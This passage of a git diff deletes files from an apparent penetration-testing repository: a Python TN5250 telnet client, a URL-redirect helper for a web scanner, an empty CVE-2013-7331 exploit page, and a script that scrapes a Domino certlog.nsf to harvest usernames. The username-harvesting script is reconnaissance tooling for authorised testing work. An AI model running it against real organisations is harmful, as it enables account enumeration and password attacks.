argv[3] - - session = self.manager.openSession('Session 1') - session.setHost(host) - #session = Session.Session(host) - - session.set_debuglevel(1) - self.myScreen = session.getScreen() - session.getScreen().add_screen_listener(self.outputScreen) - session.connect() - - def createWidgets(self): - self.makeMenuBar() - #self.canvas = self.root.createcomponent('canvas', (), None, \ - #Canvas, (self.interior(),), width=self.width, \ - #height=self.height,background="black") - self.canvas.pack(fill=BOTH) - #text = Text(self, relief=SUNKEN, fg='green', bg='black', \ - #width=150, height=50) - #text.pack(fill=BOTH) - - def makeMenuBar(self): - self.menubar = Menu(self.master) - self.master.config(menu=self.menubar) # master=top-level window - self.fileMenu() - self.editMenu() - - def fileMenu(self): - pulldown = Menu(self.menubar, tearoff=0) - pulldown.add_command(label='Open...', command=self.notdone, \ - underline=0) - pulldown.add_command(label='Quit', command=self.quit, \ - underline=0) - pulldown.entryconfig(0, state=DISABLED) - self.menubar.add_cascade(label='File', underline=0, menu=pulldown) - - def editMenu(self): - pulldown = Menu(self.menubar, tearoff=0) - pulldown.add_command(label='Copy', command=self.notdone) - pulldown.add_command(label='Paste', command=self.notdone) - pulldown.entryconfig(0, state=DISABLED) - pulldown.entryconfig(1, state=DISABLED) - self.menubar.add_cascade(label='Edit', underline=0, menu=pulldown) - - def notdone(self): - showerror('Not implemented', 'Not yet available') - - def quit(self): - if askyesno('Verify quit', 'Are you sure you want to quit?'): - Frame.quit(self) - -if __name__ == '__main__': - #root = Tk() - StartFrame().mainloop() - #root.mainloop() # if I'm run as a script diff --git a/as400/tn5250.py b/as400/tn5250.py deleted file mode 100644 index 16920df..0000000 --- a/as400/tn5250.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python -#Boa:App:BoaApp - -from wxPython.wx import * - -import frmConnect - -modules ={'frmConnect': [1, 'Main frame of Application', 'frmConnect.py']} - -class BoaApp(wxApp): - def OnInit(self): - wxInitAllImageHandlers() - self.main = frmConnect.create(None) - # needed when running from Boa under Windows 9X - self.SetTopWindow(self.main) - self.main.Show();self.main.Hide();self.main.Show() - return True - -def main(): - application = BoaApp(0) - application.MainLoop() - -if __name__ == '__main__': - main() diff --git a/as400/vt5250.py b/as400/vt5250.py deleted file mode 100644 index e9b6a58..0000000 --- a/as400/vt5250.py +++ /dev/null @@ -1,874 +0,0 @@ -"""Enhanced Telnet 5250 client class. -Based on RFC 1205: 5250 Telnet Protocol Specification, by P. Chmielewski -Example: ->>>from tnvtlib import Telnet5250 tn = Telnet5250('www.net400.org', 23) ->>>connect to as400 host -Created by Kenneth J. Pouncey 2002-05-10 -""" - -# Import modules -import sys -import socket -import select -import Queue -import CodePage -import Screen5250 - -__all__ = ["vt5250"] - -# Tunable parameters -DEBUGLEVEL = 0 - -# buffersize -BUFSIZE = 8*1024 - -# Telnet protocol defaults -TELNET_PORT = 23 - -# Telnet protocol characters (don't change) -IAC = chr(255) # "Interpret As Command" -DONT = chr(254) -DO = chr(253) -WONT = chr(252) -WILL = chr(251) -theNULL = chr(0) -SB = chr(250) # begin subnegotiation -SE = chr(240) # end subnegotiation -QUAL_IS = chr(0) # qualifier is -EOR = chr(239) # End of record -TERMINAL_TYPE = chr(24) # terminal type -OPT_END_OF_RECORD = chr(25) # End of record option RFC 885 -TRANSMIT_BINARY = chr(0) # transmit binary RFC 856 -TIMING_MARK = chr(6) # not used yet -NEW_ENVIRONMENT = chr(39) # not used yet - -class vt5250: - """vt5250 interface class. - An instance of this class represents a connection to a telnet server. - The instance is initially not connected; the open() method must be - used to establish a connection. Alternatively, the host name and - optional port number can be passed to the constructor, too. - Don't try to reopen an already connected instance. - This class has many read_*() methods. Note that some of them raise - EOFError when the end of the connection is read, because they can - return an empty string for other reasons. - See the individual doc strings. - read_all() - Read all data until EOF; may block. - read_some() - Read at least one byte or EOF; may block. - """ - - def __init__(self, host=None, port=0): - """Constructor. - When called without arguments, create an unconnected instance. - With a hostname argument, it connects the instance; a port - number is optional. - """ - self.debuglevel = DEBUGLEVEL - self.host = host - self.port = port - self.sock = None - self.rawq = '' - self.irawq = 0 - self.cookedq = '' - self.eof = 0 - self.buffer = '' - self.saveStream = '' - self.readType = 0 - self.codePage = CodePage.CodePage() - - # Create the queue - self.queue = Queue.Queue() - - if host: - self.open(host, port) - - def open(self, host, port=0): - """Connect to a host. - The optional second argument is the port number, which - defaults to the standard telnet port (23). - Don't try to reopen an already connected instance. - """ - self.eof = 0 - if not port: - port = TELNET_PORT - self.host = host - self.port = port - self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - self.sock.connect((self.host, self.port)) - self.interact() - - def __del__(self): - """Destructor -- close the connection.""" - self.close() - - def msg(self, msg, *args): - """Print a debug message, when the debug level is > 0. - If extra arguments are present, they are substituted in the - message using the standard string formatting operator. - """ - if self.debuglevel > 0: - print 'Telnet5250(%s,%d):' % (self.host, self.port), - #if args: - # print msg % args - #else: - # print msg - - def set_debuglevel(self, debuglevel): - """Set the debug level. - The higher it is, the more debug output you get (on sys.stdout). - """ - self.debuglevel = debuglevel - - def close(self): - """Close the connection.""" - if self.sock: - self.sock.close() - self.msg("socket closing down") - self.sock = 0 - self.eof = 1 - self.running = 0 - self.queue.put(None) - self.msg("socket closed down") - - def get_socket(self): - """Return the socket object used internally.""" - return self.sock - - def fileno(self): - """Return the fileno() of the socket object used internally.""" - return self.sock.fileno() - - def write(self, buffer): - """Write a string to the socket, doubling any IAC characters. - Can block if the connection is blocked. May raise - socket.error if the connection is closed. - """ - if IAC in buffer: - buffer = buffer.replace(IAC, IAC+IAC) - self.msg("send %s", `buffer`) - self.sock.send(buffer) - - def writeGDS(self,flags, opcode, bytes): - """Write a string to the socket, doubling any IAC characters. - Can block if the connection is blocked. May raise - socket.error if the connection is closed. - """ - length = 10 - buffer = [] - if len(bytes) > 0: - if IAC in bytes: - bytes = bytes.replace(IAC, IAC+IAC) - length = len(bytes) + 10 - buffer = chr(length >> 8) - buffer += chr(length & 0xff) - buffer += chr(0x12) - buffer += chr(0xA0) - buffer += chr(0x0) - buffer += chr(0x0) - buffer += chr(0x04) - buffer += chr(flags) - buffer += chr(0x0) - buffer += chr(opcode) - for x in bytes: - buffer += chr(x) - #buffer += bytes - buffer += IAC - buffer += EOR - self.msg("send %s", `buffer`) - self.sock.send(buffer) - #self.sock.flush() - - def read_all(self): - """Read all data until EOF; block until connection closed.""" - self.process_rawq() - while not self.eof: - self.load_stream() - self.process_rawq() - buf = self.cookedq - self.cookedq = '' - return buf - - def read_incoming(self): - """Read all data until EOF; block until connection closed.""" - #print 'reading' - self.process_rawq() - while not self.eof: - self.readIncoming() - self.process_rawq() - buf = self.cookedq - self.cookedq = '' - return buf - - def process_rawq(self): - """ - Transfer from raw queue to cooked queue. - Set self.eof when connection is closed. - Don't block unless in the midst of an IAC sequence. - """ - buf = '' - try: - while self.rawq: - c = self.rawq_getchar() - buf = buf + c - except EOFError: # raised by self.rawq_getchar() - pass - self.cookedq = self.cookedq + buf - - def rawq_getchar(self): - """ - Get next char from raw queue. - Block if no data is immediately available. - Raise EOFError when connection is closed. - """ - if not self.rawq: - self.fill_rawq() - if self.eof: - raise EOFError - c = self.rawq[self.irawq] - self.irawq = self.irawq + 1 - if self.irawq >= len(self.rawq): - self.rawq = '' - self.irawq = 0 - return c - - def fill_rawq(self): - """Fill raw queue from exactly one recv() system call. - Block if no data is immediately available. - Set self.eof when connection is closed. - """ - if self.irawq >= len(self.rawq): - self.rawq = '' - self.irawq = 0 - buf = self.sock.recv(BUFSIZE) - self.msg("recv %s", `buf`) - self.eof = (not buf) - self.rawq = self.rawq + buf - - def loadStream(self,stream): - """ - Fill raw queue from exactly one recv() system call. - Block if no data is immediately available. - Set self.eof when connection is closed. - """ - j = 0 - size = 0 - self.msg("recv from load stream %s", `stream`) - if self.saveStream == '': - j = (ord(stream[0]) & 0xff) << 8 | (ord(stream[1]) & 0xff); - size = len(stream); - else: - size = len(self.saveStream) + len(stream) - stream = self.saveStream + stream - j = (ord(stream[0]) & 0xff) << 8 | (ord(stream[1]) & 0xff); - self.saveStream = '' - if j > size: - self.saveStrem = stream - else: - self.queue.put(stream) - #here - #print j,size,len(stream) - #self.msg("recv from load stream %s", `stream`) - - def readIncoming(self): - """ - Fill raw queue from exactly one recv() system call. - Block if no data is immediately available. - Set self.eof when connection is closed. - """ - if self.irawq >= len(self.rawq): - self.rawq = '' - self.irawq = 0 - buf = self.sock.recv(BUFSIZE) - self.buffer = self.buffer + buf - self.msg("recv readIncoming %s" % `self.buffer`) - buffer = '' - j = -1 - startOffset = 0 - indices = range(len(self.buffer)) - for idx in indices : - i = self.buffer[idx] - if (j == IAC) and (i == IAC): - j = -1 - continue - else: - buffer = buffer + i - if (j == IAC) and (i == EOR): - self.loadStream(buffer[startOffset:idx]) - startOffset = idx + 1 - #self.eof = (not buffer) - #buffer = '' - j = i - if startOffset < idx: - self.loadStream(buffer[startOffset:idx]) - #here1 - #print idx,startOffset,len(self.buffer) - self.buffer = '' - - def sock_avail(self): - """Test whether data is available on the socket.""" - return select.select([self], [], [], 0) == ([self], [], []) - - def process_negotiations(self): - """ - Transfer from raw queue to cooked queue. - Set self.eof when connection is closed. - Don't block unless in the midst of an IAC sequence. - """ - buf = '' - done = 0 - try: - c = self.rawq_getchar() - while c == IAC: - c = self.rawq_getchar() - if c == IAC: - buf = buf + c - elif c == DO: - opt = self.rawq_getchar() - if opt == NEW_ENVIRONMENT: - self.msg('IAC DO NEW_ENVIRONMENT') - self.msg('sending : IAC WONT NEW_ENVIRONMENT') - self.sock.send(IAC + WONT + NEW_ENVIRONMENT) - elif opt == TERMINAL_TYPE: - self.msg('IAC DO TERMINAL_TYPE') - self.msg('sending : IAC WILL TERMINAL_TYPE') - self.sock.send(IAC + WILL + TERMINAL_TYPE) - elif opt == OPT_END_OF_RECORD: - self.msg('IAC DO OPT_END_OF_RECORD') - self.msg('sending : IAC WILL OPT_END_OF_RECORD') - self.sock.send(IAC + WILL + OPT_END_OF_RECORD) - elif opt == TRANSMIT_BINARY: - self.msg('IAC DO TRANSMIT_BINARY') - self.msg('sending: IAC WILL TRANSMIT_BINARY') - self.sock.send(IAC + WILL + TRANSMIT_BINARY) - else: - # default that we wont - self.msg('IAC DO %d', ord(opt)) - self.msg('sending : IAC WONT %d', ord(opt)) - self.sock.send(IAC + WONT + opt) - elif c == DONT: - opt = self.rawq_getchar() - self.msg('IAC %s %d', c == DO and 'DO' or 'DONT', \ - ord(c)) - self.sock.send(IAC + WONT + opt) - elif c == WILL: - opt = self.rawq_getchar() - if opt == OPT_END_OF_RECORD: - self.msg('IAC WILL OPT_END_OF_RECORD') - self.msg('sending : IAC DO OPT_END_OF_RECORD') - self.sock.send(IAC + DO + OPT_END_OF_RECORD) - elif opt == TRANSMIT_BINARY: - self.msg('IAC WILL TRANSMIT_BINARY') - self.msg('sending : IAC DO TRANSMIT_BINARY') - self.sock.send(IAC + DO + TRANSMIT_BINARY) - else: - self.msg('IAC WILL %d', ord(opt)) - self.msg('sending : IAC DONT %d', ord(opt)) - self.sock.send(IAC + DONT + opt) - elif c == WONT: - opt = self.rawq_getchar() - self.msg('IAC %s %d', - c == WILL and 'WILL' or 'WONT', ord(c)) - self.sock.send(IAC + DONT + opt) - elif c == SB: - sbOpt = self.rawq_getchar() - if sbOpt == TERMINAL_TYPE: - if self.rawq_getchar() == chr(1): - self.msg('sending: TERMINAL_TYPE') - self.sock.send(IAC + SB + TERMINAL_TYPE + \ - QUAL_IS + 'IBM-3179-2' + \ - IAC + SE) - elif c == SE: - self.msg('ENDING Subnegotiation') - else: - self.msg('IAC %s not recognized' % `c`) - c = self.rawq_getchar() - except EOFError: # raised by self.rawq_getchar() - pass - self.cookedq = self.cookedq + buf - self.buffer = self.rawq - - def negotiate_session(self): - self.process_negotiations() - while not self.cookedq and not self.eof and self.sock_avail(): - self.fill_rawq() - self.process_negotiations() - - def interact(self): - """Interaction function, emulates a very dumb telnet client.""" - while 1: - try: - text = self.negotiate_session() - if not text: - break - except EOFError: - break - self.mt_interact() - - def mt_interact(self): - """Multithreaded version of interact().""" - import threading - self.running = 1 - self.dataProducerThread = threading.Thread(target=self.listener) - self.dataProducerThread.start() - self.dataConsumerThread = \ - threading.Thread(target=self.parse_stream) - self.dataConsumerThread.start() - - def listener(self): - """Helper for mt_interact() -- this executes in the other thread.""" - # load the first response from host - self.loadStream(self.buffer) - while self.running: - try: - #print 'listener running' - self.read_incoming() - except EOFError: - print '*** Connection closed by remote host ***' - return - #print 'ended' - - def parse_stream(self): - import struct - import operator - self.msg ('parse stream running') - while self.running: - self.dataStream = self.queue.get() - if self.dataStream == None: - #print 'data stream is None' - self.running = 0 - continue - # Check contents of message and do what it says - # As a test, we simply print it - self.msg( 'message from queue %s', `self.dataStream`) - self.msgLen = ((ord(self.dataStream[0]) & 0xff) << 8) | \ - (ord(self.dataStream[1]) & 0xff) - opcode = ord(self.dataStream[9] ) - dataStart = 6 + ord(self.dataStream[6]) - self.pos = dataStart - self.msg( 'opcode from stream buffer %s', `opcode`) - self.msg( 'msg length from stream buffer %s', \ - `self.msgLen`) - self.msg( 'data start from stream buffer %s', `dataStart`) - if opcode == 0: - self.msg( 'No Operation ') - elif opcode == 1: - self.msg( 'Invite Operation ') - self.parseIncoming() - elif opcode == 2: - self.msg( 'Output only ') - self.parseIncoming() - elif opcode == 3: - self.msg( 'Put/Get Operation ') - self.parseIncoming() - elif opcode == 4: - self.msg( 'Save Screen Operation ') - self.parseIncoming() - elif opcode == 5: - self.msg( 'Restore Screen Operation ') - self.parseIncoming() - elif opcode == 6: - self.msg( 'Read Immediate ') - elif opcode == 7: - self.msg( 'Reserved ') - elif opcode == 8: - self.msg( 'Read Screen Operation ') - elif opcode == 9: - self.msg( 'Reserved ') - elif opcode == 10: - self.msg( 'Cancel Invite ') - elif opcode == 11: - self.msg( 'Turn on message light ') - elif opcode == 12: - self.msg( 'Turn off message light ') - else: - self.msg( 'Invalid Operation Code ') - self.msg('at end of queue') - - def parseIncoming(self): - """Parse the incoming data stream.""" - buf = '' - done = 0 - error = 0 - control0 = 0 - control1 = 0 - controlChars = 0 - while self.pos < self.msgLen and not done: - self.pos += 1 - b = ord(self.dataStream[self.pos] ) - if b == 0 or b == 1 or b == 4: - pass - elif b == 2 or b == 3: - self.msg( 'Save Screen') - elif b == 7: - self.msg( 'Audible bell') - self.pos += 2 - elif b == 17: - self.msg( 'Write to display') - self.writeToDisplay(0) - elif b == 18 or b == 19: - self.msg( 'Restore Screen') - elif b == 32: - self.msg( 'Clear unit Alternate') - self.screen.clearAll() - elif b == 33: - self.msg( 'Write Error Code') - elif b == 34: - self.msg( 'Write Error Code to Window') - elif b == 64: - self.msg( 'Clear Unit') - self.screen.clearAll() - elif b == 80: - self.msg( 'Clear Format Table') - self.screen.clearFFT() - elif b == 98 or b == 102: - self.msg( 'Read Screen Immediate') - elif b == 66 or b == 82: - self.msg( 'Read Input Fields or MDT Fields ') - self.readType = b - self.screen.goHome() - self.screen.notify_screen_listeners(1) - elif b == 83: - self.msg( 'Read MDT Immediate Alt') - elif b == 243: - self.msg( 'Write Structured Field') - self.writeStructuredField() - else: - self.msg( 'invalid option %s',b) - - def writeToDisplay(self,controlsExist): - """Parse the incoming data stream.""" - pos = 0 - error = 0 - done = 0 - attr = 0 - nextOne = 0 - control0 = 0 - control1 = 0 - # initialize from Screen object later - saRows = 24 - saColumns = 80 - if controlsExist: - self.pos += 1 - control0 = self.dataStream[self.pos] - self.pos += 1 - control1 = self.dataStream[self.pos] - #print 'in write to display' - while self.pos < self.msgLen and not done: - self.pos += 1 - which1 = ord(self.dataStream[self.pos]) - if which1 == 1: # Start of Header - self.msg( 'Start of Header') - error = self.processSOH() - elif which1 == 2: # Repeat to Address - row = self.screen.getCurrentRow() - col = self.screen.getCurrentCol() - self.pos += 1 - toRow = ord(self.dataStream[self.pos]) - self.pos += 1 - toCol = (ord(self.dataStream[self.pos]) & 0xff) - rows = self.screen.getRows() - cols = self.screen.getCols() - if toRow >= row: - self.pos += 1 - repeat = ord(self.dataStream[self.pos]) - if row == 1 and col == 2 and toRow == rows and \ - toCol == cols: - self.screen.clearAll() - else: - if repeat != 0: - repeat = self.getASCIIChar(repeat) - times = ((toRow * cols) + toCol) - \ - ((row * cols) + col) - while times >= 0: - self.screen.setChar(repeat) - times -= 1 - self.msg( 'RA - Repeat to address %s, %s',toRow,toCol) - elif which1 == 3: # EA - Erase to address - # need to implement later - self.msg( 'Erase to Address') - elif which1 == 4: # Escape - done = 1 - self.msg('Escape') - elif which1 == 16: # Transparent Data - # need to implent later - self.msg('Transparent Data') - elif which1 == 17: # SBA - Set buffer address - self.pos += 1 - saRow = ord(self.dataStream[self.pos]) - self.pos += 1 - saCol = (ord(self.dataStream[self.pos]) & 0xff) - self.screen.moveTo(saRow,saCol) - self.msg('SBA - Set buffer Address %s %s',saRow,saCol) - elif which1 == 18: # WEA - Extended Attribute - self.pos += 1 - self.dataStream[self.pos] - self.pos += 1 - self.dataStream[self.pos] - self.msg('WEA - Extended Attribute') - elif which1 == 19 or which1 == 20 : # IC - Insert Cursor - # MC - Move Cursor - self.pos += 1 - icX = ord(self.dataStream[self.pos]) - self.pos += 1 - icY = (ord(self.dataStream[self.pos]) & 0xff) - self.msg( 'IC or MC - Insert Cursor or Move Cursor \ - %s,%s',icX,icY) - self.screen.setPendingInsert(1,icX,icY) - elif which1 == 21: - # WTDSF - Write to Display Structured Field order - # implement later - self.msg( 'WTDSF - \ - Write to Display Structured Field order') - elif which1 == 29: # SOF - Start of field - """Subtopic 15.6.12""" - # lets initialize the Field format - # word and field control word - fcw1 = 0 - fcw2 = 0 - ffw1 = 0 - ffw0 = 0 - # get the first byte of the Field format word - self.pos += 1 - ffw0 = ord(self.dataStream[self.pos]) # FFW0 - # The first two bits of this byte determine if the FFW - # exits or not because it is optional we use a logical and - # to get the value of the first two bits. If the first - # two bits contain the value 01 then we have a Field format - # word. - if (ffw0 & 0x40) == 0x40: - self.pos += 1 - ffw1 = (ord(self.dataStream[self.pos]) & 0xff) # FFW1 - self.pos += 1 - fcw1 = (ord(self.dataStream[self.pos]) & 0xff) - #check for field - # after processing the Field format word we check if - # the next byte is the field attribute byte or not. - # If it is not an attribute byte then we have a field - # control word and the attribute will follow the next - # two bytes. - if not self.isAttribute(fcw1): - self.pos += 1 - fcw2 = (ord(self.dataStream[self.pos]) & 0xff) - # FCW2 - self.pos += 1 - attr = (ord(self.dataStream[self.pos]) & 0xff) - # attribute - else: - attr = fcw1 # attribute of field - fcw1 = 0 - else: - # If the check for the Field format word was not - # successful then we just use the byte read as the - # field attribute - attr = ffw0 - # We then parse the length of the field by using the next - # to bytes. Shifting the first byte and using logical or - # of the next byte will obtain us the length of the field - fLength = ((ord(self.dataStream[self.pos + 1]) & 0xff) \ - << 8) | (ord(self.dataStream[self.pos + 2]) \ - & 0xff) - self.pos += 2 - self.screen.addField(attr,fLength,ffw0,ffw1,fcw1,fcw2) - self.msg(' Start of field with \ - ',fLength,ffw0,ffw1,fcw1,fcw2) - else: - byte0 = (ord(self.dataStream[self.pos]) & 0xff) - if self.isAttribute(byte0): - self.screen.setAttr(byte0) - elif byte0 < 64: - self.screen.setChar(byte0) - else: - self.screen.setChar(self.getASCIIChar(byte0)) - if error: - done = 1 - return error - - def processSOH(self): - """ Process start of header information """ - self.pos += 1 - len = ord(self.dataStream[self.pos]) - if len > 0 and len <= 7: - self.pos += 1 - self.dataStream[self.pos] # flag byte 2 - self.pos += 1 - self.dataStream[self.pos] # Reserved - self.pos += 1 - self.dataStream[self.pos] # Resequence fields - # add support for parse error line later - self.pos += 1 - self.dataStream[self.pos] # Error line - byte1 = 0 - if len >= 5 : - self.pos += 1 - byte1 = ord(self.dataStream[self.pos]) - if len >= 6 : - self.pos += 1 - byte1 = ord(self.dataStream[self.pos]) - if len >= 7 : - self.pos += 1 - byte1 = ord(self.dataStream[self.pos]) - return 0 - else: - return 1 - - def isAttribute(self,byte): - """ Check if the byte is an attribute byte or not """ - return (byte & 0xe0) == 0x20; - - def getASCIIChar(self,byte): - return self.codePage.ebcdic2uni(byte) - - def setScreen(self,screen): - self.screen = screen - - def sendAidKey(self,aid): - """ - Send aid key and associated field format data to host - """ - boasp = [] - boasp.append(self.screen.getCurrentRow()) - boasp.append(self.screen.getCurrentCol()) - boasp.append(aid) - self.screen.getFields().readFormatTable(boasp,self.readType,self.codePage) - self.writeGDS(0,3,boasp) - - def writeStructuredField(self): - """ - Write structured field for query message response - """ - length = ((ord(self.dataStream[self.pos + 1]) & 0xff) \ - << 8) | (ord(self.dataStream[self.pos + 2]) \ - & 0xff) - self.pos += 2 - #print length - self.pos += 1 - StartOfHeaderOrder = ord(self.dataStream[self.pos]) - #print StartOfHeaderOrder - self.pos += 1 - queryrequest = ord(self.dataStream[self.pos]) - print queryrequest - self.pos += 1 - ord(self.dataStream[self.pos]) - print 'now lets send query response' - self.sendQueryResponse() - - def sendQueryResponse(self): - """ - The query command is used to obtain information about the capabilities - of the 5250 display. - The Query command must follow an Escape (0x04) and Write Structured - Field command (0xF3). - This section is modeled after the rfc1205 - 5250 Telnet Interface section - 5.3 - """ - abyte = [] - abyte.append(0x00) ## Cursor row column set to 0,0 - abyte.append(0x00) - abyte.append(0x88) ## 0x88 inbound write structure field aid - abyte.append(0x00) ## length of query response - abyte.append(0x3A) ## Set to 58 for normal emulation - abyte.append(0xD9) ## command class - abyte.append(0x70) ## command type query - abyte.append(0x80) ## Flag byte - abyte.append(0x06) ## controller hardware class - abyte.append(0x00) ## 0x0600 - other WSF or another 5250 emulator - abyte.append(0x01) ## Controller Code Level - abyte.append(0x01) - abyte.append(0x00) - abyte.append(0x0) ## 13 - 28 are reserved - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x01) ## device type - 0x01 5250 Emulator - abyte.append(ord(self.codePage.uni2ebcdic('5'))) ## device type character - abyte.append(ord(self.codePage.uni2ebcdic('2'))) - abyte.append(ord(self.codePage.uni2ebcdic('5'))) - abyte.append(ord(self.codePage.uni2ebcdic('1'))) - abyte.append(ord(self.codePage.uni2ebcdic('0'))) - abyte.append(ord(self.codePage.uni2ebcdic('1'))) - abyte.append(ord(self.codePage.uni2ebcdic('1'))) - abyte.append(0x02) ## keyboard id - 0x02 Standard Keyboard - abyte.append(0x00) ## extended keyboard id - abyte.append(0x00) ## reserved - abyte.append(0x00) ## 40 - 43 Display Serial Number - abyte.append(36) - abyte.append(36) - abyte.append(0x00) - abyte.append(0x01) ## Maximum number of display fields - 256 - abyte.append(0x00) ## 0x0100 - abyte.append(0x0) ## 46 - 48 reserved set to 0x00 - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x01) ## 49 - 53 Controller Display Capability - abyte.append(16) - abyte.append(0x0) - abyte.append(0x0) - """ - 53 - Bit 0-2: B'000' - no graphics capability - B'001' - 5292-2 style graphics - Bit 3-7: B '00000' = reserved (it seems for Client access) - """ - abyte.append(0x0) ## 0x0 is normal emulation - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - abyte.append(0x0) - self.writeGDS(0,0,abyte) - -def test(): - """Test program for tnvtlib. - Usage: python tnvtlib.py [-d] ... [host [port]] - Default host is localhost; default port is 23. - """ - import signal - import Screen5250 - debuglevel = 0 - while sys.argv[1:] and sys.argv[1] == '-d': - debuglevel = debuglevel+1 - del sys.argv[1] - host = 'localhost' - if sys.argv[1:]: - host = sys.argv[1] - port = 0 - if sys.argv[2:]: - portstr = sys.argv[2] - try: - port = int(portstr) - except ValueError: - port = socket.getservbyname(portstr, 'tcp') - tn = vt5250() - tn.set_debuglevel(debuglevel) - tn.setScreen(Screen5250.Screen5250()) - tn.open(host, port) - while tn.running: - pass - tn.close() - print 'I am here' - sys.exit - print 'After exit' - - def onSignal(signum, stackFrame): - """ - Let's capture the signals and close connections - so we do not get zombie processes. - """ - tn.close() - -if __name__ == '__main__': - test() diff --git a/as400/vt5250.pyc b/as400/vt5250.pyc deleted file mode 100644 index cab4f42..0000000 Binary files a/as400/vt5250.pyc and /dev/null differ diff --git a/cenzic/README.md b/cenzic/README.md deleted file mode 100755 index 7a1cfab..0000000 --- a/cenzic/README.md +++ /dev/null @@ -1,7 +0,0 @@ -# url2cenzic.py -url2cenzic - -Cenzic Hailstorm Appscanner needs to accept proper URLs (final redirected URLs) -This script parses the file containing the list of URLs and gets the final redirected URL and writes them into a CSV file that you can use to import into Cenzic Hailstorm Appscanner - -![alt tag](https://raw.githubusercontent.com/milo2012/pentest_scripts/master/cenzic/screenshot1.png) diff --git a/cenzic/screenshot1.png b/cenzic/screenshot1.png deleted file mode 100644 index 0cc1a23..0000000 Binary files a/cenzic/screenshot1.png and /dev/null differ diff --git a/cenzic/url2cenzic.py b/cenzic/url2cenzic.py deleted file mode 100644 index 7873fd7..0000000 --- a/cenzic/url2cenzic.py +++ /dev/null @@ -1,131 +0,0 @@ -import urllib2 -import socket -import argparse -import sys -import multiprocessing - -numProcess=10 -default_timeout = 10 -socket.setdefaulttimeout(default_timeout) - -def get_redirected_url(url): - try: - opener = urllib2.build_opener(urllib2.HTTPRedirectHandler) - opener.addheaders = [('User-agent', 'Mozilla/5.0')] - urllib2.install_opener(opener) - request = opener.open(url) - return request.url - #except urllib2.HTTPError: - # return None - #except urllib2.URLError: - # return None - except Exception as e: - #return str(e) - return None - - -class Worker(multiprocessing.Process): - - def __init__(self, - work_queue, - result_queue, - ): - # base class initialization - multiprocessing.Process.__init__(self) - self.work_queue = work_queue - self.result_queue = result_queue - self.kill_received = False - - def run(self): - while (not (self.kill_received)) and (self.work_queue.empty()==False): - try: - job = self.work_queue.get_nowait() - except: - break - - (jobid,url) = job - rtnVal = (jobid,get_redirected_url(url)) - self.result_queue.put(rtnVal) - -def execute(jobs, num_processes=2): - # load up work queue - work_queue = multiprocessing.Queue() - for job in jobs: - work_queue.put(job) - - # create a queue to pass to workers to store the results - result_queue = multiprocessing.Queue() - - # spawn workers - worker = [] - for i in range(int(num_processes)): - worker.append(Worker(work_queue, result_queue)) - worker[i].start() - - # collect the results from the queue - results = [] - while len(results) < len(jobs): #Beware - if a job hangs, then the whole program will hang - result = result_queue.get() - results.append(result) - results.sort() # The tuples in result are sorted according to the first element - the jobid - return (results) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('-f', dest='filename', action='store', help='[filename containing urls]') - parser.add_argument('-p', dest='projectName', action='store', help='[abbreviation of the project. do not use spaces]') - parser.add_argument('-o', dest='output', action='store', help='[output cenzic CSV file]') - options = parser.parse_args() - - if len(sys.argv)==1: - parser.print_help() - sys.exit(1) - else: - if not options.output: - print "[!] Please use the -output argument." - if not options.filename: - print "[!] Please use the -filename argument." - if options.filename and options.output and options.projectName: - resultList=[] - filename = options.filename - lines=[] - with open(filename) as filename: - lines = filename.read().splitlines() - jobs=[] - jobid=0 - for line in lines: - line=line.strip() - print line - if "#" not in line and len(line)>0: - jobs.append((jobid,line)) - jobid = jobid+1 - results = execute(jobs,int(numProcess)) - for result in results: - if result[1] not in resultList and result[1]!=None: - if ['"'+result[1]+'"','"'+options.projectName+"_"+result[1]+'"',"","","","",'"NetPenScan"','"10/2/2014"'] not in resultList: - resultList.append(['"'+result[1]+'"','"'+options.projectName+"_"+result[1]+'"',"","","","",'"NetPenScan"','"10/2/2014"']) - #resultList.append(['"'+result[1]+'"','"'+options.projectName+"_"+result[1]+'"',"","","","","",'"NetPenScan"','"10/2/2014"']) - if len(resultList)>0: - print "\n\n************** Results **************" - print "Found the below URLs" - - for x in resultList: - print x[0] - - if ".csv" not in options.output: - file = open(options.output+".csv", "w") - for x in resultList: - file.write(x[0]+','+x[1]+','+x[2]+','+x[3]+','+x[4]+','+x[5]+','+x[6]+','+x[7]+'\n') - file.close() - print "[*] Import "+options.output+".csv into Cenzic" - else: - file = open(options.output, "w") - for x in resultList: - file.write(x[0]+','+x[1]+','+x[2]+','+x[3]+','+x[4]+','+x[5]+','+x[6]+','+x[7]+','+'\n') - file.close() - print "[*] Import "+options.output+" into Cenzic" - - else: - print "\n\n************** Results **************" - print "- No URLs found" diff --git a/exploits/cve-2013-7331.html b/exploits/cve-2013-7331.html deleted file mode 100644 index 079be2c..0000000 --- a/exploits/cve-2013-7331.html +++ /dev/null @@ -1,120 +0,0 @@ - - - - - - - jsFiddle demo - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/extractDominoUsers.py b/extractDominoUsers.py deleted file mode 100755 index 5bbc092..0000000 --- a/extractDominoUsers.py +++ /dev/null @@ -1,42 +0,0 @@ -from lxml import html -import httplib -from urlparse import urlparse -import requests,sys - -url = "https://webmail.xxxx.com/certlog.nsf" - - -page = requests.get(url,verify=False) -if "Certificate Log" not in page.text: - print "[!] Please check URL" -else: -#domainName = "carnivalaustralia.com" - page = requests.get(url,verify=False) - tree = html.fromstring(page.text) - path = elements = tree.xpath('/html/body/ul/li[3]/a/@href') - hostname = urlparse(url).hostname - scheme = urlparse(url).scheme - startUrl = scheme+"://"+hostname+path[0] - - nameList=[] - count=1 - while True: - url = startUrl+"&Start="+str(count)+"&ExpandView" - #print url - page = requests.get(url,verify=False) - tree = html.fromstring(page.text) - elements = tree.xpath('//tr/td//text()') - if len(elements)>5: - counter=0 - for i in elements: - if counter%5==0: - username = i.replace(", ",".") - if username not in nameList: - if "/" not in username and username!='Previous': - nameList.append(username) - print username - #print username+"@"+domainName - counter+=1 - elif 